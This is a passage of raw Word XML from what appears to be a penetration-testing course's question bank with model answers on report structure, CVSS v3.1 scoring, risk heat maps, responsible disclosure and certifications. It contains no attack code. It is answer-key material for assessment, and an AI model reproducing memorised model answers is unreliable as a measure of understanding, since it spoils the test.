          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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 defensible score requires showing the vector string and the reasoning behind each metric choice.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Parameterised queries are the root-cause fix for injection flaws.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Both are platforms connecting organisations with researchers for responsible vulnerability disclosure and rewards.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Showing the reasoning lets stakeholders sanity-check and trust the prioritisation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Answer Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> List the main sections of a professional penetration test report.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cover page; Executive summary; Scope &amp; methodology; Technical findings (each with title, severity/CVSS, affected system, description, evidence, business impact, remediation, CVE/CWE reference); Risk heat map; Remediation priority table / conclusion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why is CVSS described as combining several independent factors rather than reflecting a single property of a vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS combines Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope and the separate Confidentiality/Integrity/Availability impacts. Two vulnerabilities can share the same Attack Vector (e.g. both Network) yet score very differently once the other factors — such as whether authentication or user interaction is needed, and how complete the impact is — are taken into account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is a risk heat map, and why is it useful alongside CVSS scoring?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A risk heat map plots findings on a grid of likelihood versus impact, giving a quick visual sense of priority. It complements CVSS by presenting risk in a format non-technical stakeholders can grasp instantly, without needing to read every detailed score and vector string.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain the principle of responsible disclosure.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">When a vulnerability is discovered — including one outside the agreed scope or after an engagement has ended — it should be reported privately to the affected organisation first, giving them a reasonable window of time to fix the issue before any public disclosure, rather than publishing it immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Name the four certification pathways discussed in this unit and order them roughly from entry-level to advanced.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CompTIA Security+ (entry-level, foundational), CEH (intermediate, conceptual breadth), eJPT (beginner, practical/hands-on), and OSCP (advanced, fully practical and highly respected). A typical progression would be Security+ first, then eJPT for hands-on practice, CEH for broader conceptual coverage, and OSCP as an advanced practical goal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-Answer / Descriptive Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Walk through the CVSS v3.1 base score calculation for (a) a network-exploitable, unauthenticated backdoor with full system compromise and (b) a stored XSS vulnerability requiring user interaction, stating the metric value you choose for each of the six base metrics and explaining why the two scores differ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(a) Network-exploitable backdoor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Vector = Network (reachable over the internet/LAN with no physical or local access needed); Attack Complexity = Low (no special conditions required to exploit); Privileges Required = None (no authentication needed); User Interaction = None (no victim action required); Scope = Unchanged (the exploited component and the impacted component are the same); Confidentiality/Integrity/Availability = High/High/High (full remote code execution gives complete control). Vector string: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, giving a base score of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.8 (Critical)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(b) Stored XSS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Vector = Network (the page is reached over the web); Attack Complexity = Low (no special conditions); Privileges Required = None (any visitor can view the infected page); User Interaction = Required (a victim must actually view the page containing the script); Scope = Changed (the script executes in the victim's browser session, affecting a security scope beyond the vulnerable web application component itself); Confidentiality/Integrity = Low/Low (typically limited to session/cookie theft or minor page manipulation, not full system compromise); Availability = None. Vector string: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, giving a base score of approximately </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 (Medium)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why they differ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> although both share Attack Vector: Network and Attack Complexity: Low, the backdoor needs no authentication and no victim action and grants complete system control, while the XSS needs a victim to view a page and yields only partial, browser-session-level impact. CVSS is explicitly designed so that ease of exploitation (no auth, no interaction) and completeness of impact (full C/I/A) both push a score upward together — when either factor is reduced, as with the XSS case, the overall score drops substantially even though the vulnerability is still real and worth fixing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Describe the complete lifecycle of a professional VAPT engagement from the legal/ethical groundwork through to the final deliverable, referencing concepts from Units I and V.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The lifecycle begins exactly where Unit I started: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">written authorisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a signed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rules of Engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NDA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and a precise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scope definition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
